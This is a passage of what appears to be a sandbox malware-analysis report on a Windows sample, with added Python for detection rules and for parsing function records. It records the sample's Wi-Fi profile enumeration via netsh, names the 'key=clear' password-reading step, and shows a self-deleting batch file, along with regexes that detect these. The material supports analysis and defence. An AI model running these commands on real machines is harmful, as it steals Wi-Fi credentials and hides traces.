                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:TaskKill /F /IM 4524
                                                                                              Imagebase:0x1c0000
                                                                                              File size:74'240 bytes
                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:Timeout /T 2 /Nobreak
                                                                                              Imagebase:0x4e0000
                                                                                              File size:25'088 bytes
                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784
                                                                                              Imagebase:0x110000
                                                                                              File size:482'640 bytes
                                                                                              MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true
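
The process list above shows two command chains the sample drives through cmd.exe: a Wi-Fi profile enumeration (Target IDs 4, 7, 8 and 9: `chcp 65001 && netsh wlan show profiles | findstr All`, the usual first step before `netsh wlan show profile name=<ssid> key=clear`) and a self-deleting batch file in `%TEMP%` that runs TaskKill and Timeout (Target IDs 10, 14 and 16). Note that `TaskKill /F /IM 4524` passes a number to `/IM`, which expects an image name (the PID switch is `/PID`), so that step would not terminate PID 4524. The following is an added detection example, not part of the Joe Sandbox report: it runs over constructed Sysmon-style process-creation records whose command lines are copied from the report but whose PIDs and parent links are assumptions, and it walks up through cmd.exe wrappers to attribute each hit to the process that really issued the command.

```python
import ntpath
import re

# Constructed process-creation records (Sysmon Event ID 1 style) modelled on the
# chains in the process list above. PIDs and parent links are assumptions for
# the example; only the command lines are taken from the report.
SAMPLE_EVENTS = [
    {"pid": 4524, "ppid": 900, "image": r"C:\Users\user\Desktop\zyEDYRU0jw.exe",
     "cmdline": r'"C:\Users\user\Desktop\zyEDYRU0jw.exe"'},
    {"pid": 5100, "ppid": 4524, "image": r"C:\Windows\SysWOW64\tasklist.exe",
     "cmdline": "tasklist"},
    {"pid": 5200, "ppid": 4524, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": '"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All'},
    {"pid": 5210, "ppid": 5200, "image": r"C:\Windows\SysWOW64\chcp.com",
     "cmdline": "chcp 65001"},
    {"pid": 5220, "ppid": 5200, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": "netsh wlan show profiles"},
    {"pid": 5230, "ppid": 5200, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": "findstr All"},
    {"pid": 5300, "ppid": 4524, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat'
                r' & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat'},
    {"pid": 5310, "ppid": 5300, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": "TaskKill /F /IM 4524"},
    {"pid": 5320, "ppid": 5300, "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmdline": "Timeout /T 2 /Nobreak"},
    # Benign administrative use of netsh that must not fire.
    {"pid": 6000, "ppid": 900, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},
]

WLAN_PROFILE_RE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.I)
# A .bat path that is executed and then deleted in the same cmd.exe command line.
SELF_DELETING_BAT_RE = re.compile(r"/c\s+(?P<bat>\S+\.bat)\s*&+\s*del\s+(?P=bat)", re.I)
# /IM takes an image name; a bare number after it means the author meant /PID.
TASKKILL_IM_NUMERIC_RE = re.compile(r"/im\s+(\d+)\s*$", re.I)


def image_name(event):
    """Lower-cased file name of the event's image path (Windows path semantics)."""
    return ntpath.basename(event["image"]).lower()


def spawner(event, by_pid):
    """Walk up through cmd.exe wrappers to the process that actually issued the command."""
    cur = event
    while True:
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return None
        if image_name(parent) != "cmd.exe":
            return image_name(parent)
        cur = parent


def detect(events):
    """Return one alert dict per matching event; non-matching events produce nothing."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, cmd = image_name(e), e["cmdline"]
        if name == "netsh.exe" and WLAN_PROFILE_RE.search(cmd):
            # Plain "show profiles" is reconnaissance; "key=clear" is the actual theft.
            alerts.append({"rule": "wlan_profile_harvest", "pid": e["pid"],
                           "severity": "high" if KEY_CLEAR_RE.search(cmd) else "medium",
                           "spawner": spawner(e, by_pid)})
        elif name == "cmd.exe" and (m := SELF_DELETING_BAT_RE.search(cmd)):
            alerts.append({"rule": "self_deleting_batch", "pid": e["pid"],
                           "severity": "medium", "bat": m.group("bat"),
                           "spawner": spawner(e, by_pid)})
        elif name == "taskkill.exe" and (m := TASKKILL_IM_NUMERIC_RE.search(cmd)):
            alerts.append({"rule": "taskkill_im_with_pid", "pid": e["pid"],
                           "severity": "low", "target": int(m.group(1)),
                           "spawner": spawner(e, by_pid)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The parent walk matters in practice: the interesting attribution is the non-cmd ancestor (here the sample itself), because the netsh and taskkill events are always children of a throwaway cmd.exe. Raising severity only on `key=clear` keeps the rule useful on helpdesk machines where profile listing is routine.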


                                                                                                Execution Graph

                                                                                                Execution Coverage:16.3%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:2.6%
                                                                                                Total number of Nodes:114
                                                                                                Total number of Limit Nodes:7
execution_graph: [node/edge graph omitted; the rendered graph is not reproducible in text]. Imported API calls resolved in the graph, by memory region: region 0x01830000: KiUserCallbackDispatcher, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, OleInitialize, DuplicateHandle; region 0x08710000: LoadLibraryA, CreateToolhelp32Snapshot, Process32First.

                                                                                                Control-flow Graph

control_flow_graph: [basic-block graph of the function at 0x0871b9a0 omitted; the rendered graph is not reproducible in text]. The function calls 0x0871af50, 0x0871b728 and 0x0871b7b0 and re-enters itself through 0x0871b9a0 / 0x0871b98f.
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: d
                                                                                                • API String ID: 0-2564639436
                                                                                                • Opcode ID: e342c3d4cb0a68ca2f09207f524ed634dc12adde2b7cf8199f9ef8f742866660
                                                                                                • Instruction ID: 76daef5fd7eff653fc4767402e55770445b36a30b164eabf03d7d46ecb63288d
                                                                                                • Opcode Fuzzy Hash: e342c3d4cb0a68ca2f09207f524ed634dc12adde2b7cf8199f9ef8f742866660
                                                                                                • Instruction Fuzzy Hash: 03623B74A00214DFDB15CFA8C884A5DB7F6FF88315F158269D409AB769CB30ED86CB94
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 08714BB2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3332741929-0
                                                                                                • Opcode ID: 4cbdd7b8943d5590f5275d5bc63519e96694c9b30679b7eb34f5db707ecc120e
                                                                                                • Instruction ID: 1de13fbc98d909b3d5e5f84cb399a44c3af4cd307824f84ceddc7013f099a440
                                                                                                • Opcode Fuzzy Hash: 4cbdd7b8943d5590f5275d5bc63519e96694c9b30679b7eb34f5db707ecc120e
                                                                                                • Instruction Fuzzy Hash: F11103B19002498FCB20DF9AD884B9EFFF8EB48324F208459D458A3640C374A984CFA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 09f2c2ac40bf13ecb7d991f493d9a78dff6cf6f6b5a1c24d36f27bad0b370bc9
                                                                                                • Instruction ID: 57156ee54dedfa8adaa7cdd62ee6efbf469697f3b8cde503fd302c5f900eb7d6
                                                                                                • Opcode Fuzzy Hash: 09f2c2ac40bf13ecb7d991f493d9a78dff6cf6f6b5a1c24d36f27bad0b370bc9
                                                                                                • Instruction Fuzzy Hash: 56925C71A152068FDB50CF5CC484A6DB7B2FB88301F25C669D404DBB4ACB7AEC86DB90
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd

Control-flow Graph (function at 183e0bf)
APIs
• GetCurrentProcess.KERNEL32 ref: 0183E15E
• GetCurrentThread.KERNEL32 ref: 0183E19B
• GetCurrentProcess.KERNEL32 ref: 0183E1D8
• GetCurrentThreadId.KERNEL32 ref: 0183E231
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
Similarity
• API ID: Current$ProcessThread
• API String ID: 2063062207-0

Control-flow Graph (function at 183e0e0)
APIs
• GetCurrentProcess.KERNEL32 ref: 0183E15E
• GetCurrentThread.KERNEL32 ref: 0183E19B
• GetCurrentProcess.KERNEL32 ref: 0183E1D8
• GetCurrentThreadId.KERNEL32 ref: 0183E231
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
Similarity
• API ID: Current$ProcessThread
• API String ID: 2063062207-0

Control-flow Graph (function at 8891e80)
Memory Dump Source
• Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
Similarity
• String ID: (q$(q$xq$xq
• API String ID: 0-4001314665

Control-flow Graph (function at 87175f0)
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Similarity
• API ID: LibraryLoad
• API String ID: 1029625771-0

Control-flow Graph (function at 8714be4)
APIs
• Process32First.KERNEL32(?,?), ref: 08714CD6
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Similarity
• API ID: FirstProcess32
• API String ID: 2623510744-0

Control-flow Graph (function at 8713ed8)
APIs
• Process32First.KERNEL32(?,?), ref: 08714CD6
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Similarity
• API ID: FirstProcess32
• API String ID: 2623510744-0

Control-flow Graph (function at 8713ecc)
APIs
• Process32First.KERNEL32(?,?), ref: 08714CD6
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Similarity
• API ID: FirstProcess32
• API String ID: 2623510744-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                Control-flow graph for the function at 8715d74-87176f7 (basic blocks listed by node id with their address range and successor edges; the block at 8717730-871777c is the one that calls LoadLibraryA):
                                                                                                • 678: 8715d74-87176f7 -> 681, 682
                                                                                                • 681: 8717730-871777c (LoadLibraryA) -> 687, 688
                                                                                                • 682: 87176f9-8717703 -> 681, 683
                                                                                                • 683: 8717705-8717707 -> 685, 686
                                                                                                • 685: 8717709-8717713 -> 689, 690
                                                                                                • 686: 871772a-871772d -> 681
                                                                                                • 687: 8717785-87177bd -> 695, 696
                                                                                                • 688: 871777e-8717784 -> 687
                                                                                                • 689: 8717715 -> 690
                                                                                                • 690: 8717717-8717726 -> 690 (self-loop), 691
                                                                                                • 691: 8717728 -> 686
                                                                                                • 695: 87177cd -> 698
                                                                                                • 696: 87177bf-87177c3 -> 695, 697
                                                                                                • 697: 87177c5 -> 695
                                                                                                • 698: 87177ce -> 698 (self-loop)
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: ea227ef531d99c42be1691849a5f715984d58eae30f84c1dbff282592eb389b8
                                                                                                • Instruction ID: 82c192496f3728a7a8f73efffbf2162d7260b13f01a91fa4de9b3dcc7ada84bf
                                                                                                • Opcode Fuzzy Hash: ea227ef531d99c42be1691849a5f715984d58eae30f84c1dbff282592eb389b8
                                                                                                • Instruction Fuzzy Hash: 584167B0D112498FDF14CFA9C88579EBBF1EB48340F188529E814A7A48D7749886CFA1
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0183E3AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
                                                                                                • Instruction ID: 8fd9eb162261c33f43b97acab89dd356dcfae53869fdb1473e20e4ef460cf212
                                                                                                • Opcode Fuzzy Hash: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
                                                                                                • Instruction Fuzzy Hash: ED21E6B5D012499FDB10CFAAD885ADEBFF8EB48310F14841AE914A3350D374A944CFA5
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0183E3AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 9622f665150b9ac20454de7465d0e289323b506d370c0a8808d9d5d3a2661a6d
                                                                                                • Instruction ID: 00cdd8df6ac081f4c81304b7075d0e6989519928a1ad4d5c2492430b890c8910
                                                                                                • Opcode Fuzzy Hash: 9622f665150b9ac20454de7465d0e289323b506d370c0a8808d9d5d3a2661a6d
                                                                                                • Instruction Fuzzy Hash: C121C2B5900249AFDB10CFAAD884ADEBBF8EB48310F14841AE918A3350D374A944CFA5
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0183CBE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 54671f49e687ea89c57bd67f2141ee8ee074c479499cf506921995b2d2317893
                                                                                                • Instruction ID: 3fb658eb3254387b3703f8d37a3768401383252ce99e6e70088d66b0575fa923
                                                                                                • Opcode Fuzzy Hash: 54671f49e687ea89c57bd67f2141ee8ee074c479499cf506921995b2d2317893
                                                                                                • Instruction Fuzzy Hash: 1C2169B1D053498FCB10CFA9D945BEEBBB4FB08714F14845AD419B7281C3786A89CFA1
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0183CBE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: f4d4b067e7a3861dea1191e8c7b72d22f2d30c59a3cfda58a1874d7454ef188b
                                                                                                • Instruction ID: 98984c6b8380a647f342f110b0bdfd7fc45a871a9c0ad2a90907ba4fc8c48b9c
                                                                                                • Opcode Fuzzy Hash: f4d4b067e7a3861dea1191e8c7b72d22f2d30c59a3cfda58a1874d7454ef188b
                                                                                                • Instruction Fuzzy Hash: 642138B1D003098FCB14CFA9D8457EEBBB4FB08724F14845AD429B7280C7746A89CFA1
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 08714BB2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3332741929-0
                                                                                                • Opcode ID: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
                                                                                                • Instruction ID: bf08e9f0c2b699988198210d26b1ec4941552827edfc7ab73e61e5b49033d9d8
                                                                                                • Opcode Fuzzy Hash: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
                                                                                                • Instruction Fuzzy Hash: 811106B59002498FCB20CF9AD484B9EFFF8FB48314F248459D558A7750C374A984CFA4
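The per-function records in this section (the "APIs", "Memory Dump Source" and "Similarity" blocks) are what an analyst pivots on when hunting the same routine in another sample: the referenced API and call-site address, the dump offset the function was lifted from, and the Opcode ID / Instruction Fuzzy Hash. Below is an added example, not Joe Sandbox's own code, that parses three of this page's records (transcribed as constructed input) into structured rows and indexes them by referenced API. It assumes, from what is visible on this page rather than from any documented Joe Sandbox format, that every record ends with its "Instruction Fuzzy Hash" line and that API lines follow the "Name.Module(args), ref: ADDR" shape; the function and variable names are the example's own.

```python
import re
from collections import defaultdict

# Constructed input: three records transcribed from this report's function list.
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0183E3AF
Memory Dump Source
• Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
• Instruction ID: 8fd9eb162261c33f43b97acab89dd356dcfae53869fdb1473e20e4ef460cf212
• Opcode Fuzzy Hash: deca8478d3c355b3c18065606c04b7f4e3e661c271f09a3c6d07fea34065cbf9
• Instruction Fuzzy Hash: ED21E6B5D012499FDB10CFAAD885ADEBFF8EB48310F14841AE914A3350D374A944CFA5
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 08714BB2
Memory Dump Source
• Source File: 00000000.00000002.108457155584.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8710000_zyEDYRU0jw.jbxd
Similarity
• API ID: CreateSnapshotToolhelp32
• String ID:
• API String ID: 3332741929-0
• Opcode ID: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
• Instruction ID: bf08e9f0c2b699988198210d26b1ec4941552827edfc7ab73e61e5b49033d9d8
• Opcode Fuzzy Hash: e87322396c3ffe04443513dd2fb386bd108faa2f28fc993aa30e96a745351832
• Instruction Fuzzy Hash: 811106B59002498FCB20CF9AD484B9EFFF8FB48314F248459D558A7750C374A984CFA4
Memory Dump Source
• Source File: 00000000.00000002.108457353667.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8890000_zyEDYRU0jw.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34e6d93956acca894d5309f1bf9195dad144b2fc54ea221afa195eec3b5cfa2c
• Instruction ID: 0f8ff3dfa71b3433a65b3d4d6462386b0b0d3835b954d786c658463d8183e2ef
• Opcode Fuzzy Hash: 34e6d93956acca894d5309f1bf9195dad144b2fc54ea221afa195eec3b5cfa2c
• Instruction Fuzzy Hash: 73717835700B049FEB249B64C894B2BB7F3BB88711F14891CE68697B84CB74F846CB91
"""

# Shapes observed on this page (assumption, not a documented format):
# "• Name.Module(args), ref: ADDR" or "• Name.Module ref: ADDR"
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
SRC_RE = re.compile(r"^(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)$")


def parse_records(text):
    """Split report text into one dict per function record.

    Assumption from this page: 'Instruction Fuzzy Hash' is always the last
    field of a record, so it doubles as the record terminator.
    """
    records, cur = [], {"calls": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:  # referenced API with its call-site address
            name, module, args, ref = m.groups()
            cur["calls"].append({"api": name, "module": module,
                                 "args": args or "", "ref": int(ref, 16)})
            continue
        m = KV_RE.match(line)
        if not m:
            continue  # section headers: APIs, Memory Dump Source, Similarity, ...
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SRC_RE.match(value)
            if s:  # split the dump file name from the region offset it was lifted at
                cur["source_file"] = s.group(1)
                cur["offset"] = int(s.group(2), 16)
                cur["based_on_pe"] = s.group(3).lower() == "true"
        cur[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = {"calls": []}
    return records


def index_by_api(records):
    """Map each referenced API name to the Opcode IDs of the functions that
    call it; the Opcode ID is the handle to search for in other samples."""
    idx = defaultdict(list)
    for r in records:
        for c in r["calls"]:
            idx[c["api"]].append(r["Opcode ID"])
    return dict(idx)


RECORDS = parse_records(SAMPLE)

if __name__ == "__main__":
    for r in RECORDS:
        calls = ", ".join(f"{c['module']}!{c['api']}@{c['ref']:08X}" for c in r["calls"])
        print(f"{r['offset']:08X}  {r['Opcode ID'][:16]}...  {calls or '(no API refs)'}")
```

Records without an API reference (the third one above) still carry an Opcode ID and a dump offset, so they remain useful for matching on the fuzzy hashes even though `index_by_api` has nothing to key them on.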
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: dcf8e713902027b04ec8b14d05c9efc3069859b0c583fec65799ed0298b66879
                                                                                                • Instruction ID: b095f3b31bb45cd24433611468484ba471a3873c7d7526d920131de76696c1f3
                                                                                                • Opcode Fuzzy Hash: dcf8e713902027b04ec8b14d05c9efc3069859b0c583fec65799ed0298b66879
                                                                                                • Instruction Fuzzy Hash: 0C1115B1D003488FDB20DF9AD485B9EBBF4EB48314F248459E519A7740D374AA84CFE5
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: e946abfff38b6f3b1ceb3c4e0273ee6a54be8776baddd921e96bf10f21eaf5db
                                                                                                • Instruction ID: 1514549f6a91ac214437a2f76beeafabd070c72e0c8f7a5521229f9bc81423e6
                                                                                                • Opcode Fuzzy Hash: e946abfff38b6f3b1ceb3c4e0273ee6a54be8776baddd921e96bf10f21eaf5db
                                                                                                • Instruction Fuzzy Hash: 0F1115B5D003488FDB20DF9AD885BDEBBF4EB48324F24845AE518A7740D774A584CFA5
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0183F5BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.108444160649.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1830000_zyEDYRU0jw.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 20b6c48eb562e3cc4691494afd5a0b277d6ee90440709925a4121bfbab382a46
                                                                                                • Instruction ID: 4473fb5abbf96e91d3c93bedebfaab0c0a9425fabd98791a630d1f0e3a784030
                                                                                                • Opcode Fuzzy Hash: 20b6c48eb562e3cc4691494afd5a0b277d6ee90440709925a4121bfbab382a46
                                                                                                • Instruction Fuzzy Hash: E9F0F673E052504FEB209B6DF4043AABFE1DFD5364F2A4077E548D7688C9788A8987E1
                                                                                                Strings
                                                                                                Memory Dump Source
